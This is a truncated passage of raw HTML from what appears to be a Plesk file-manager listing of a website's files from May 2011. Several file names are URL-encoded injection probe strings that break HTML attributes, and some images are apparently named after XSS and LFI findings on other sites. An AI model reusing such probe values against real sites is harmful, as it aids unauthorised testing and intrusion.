onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" 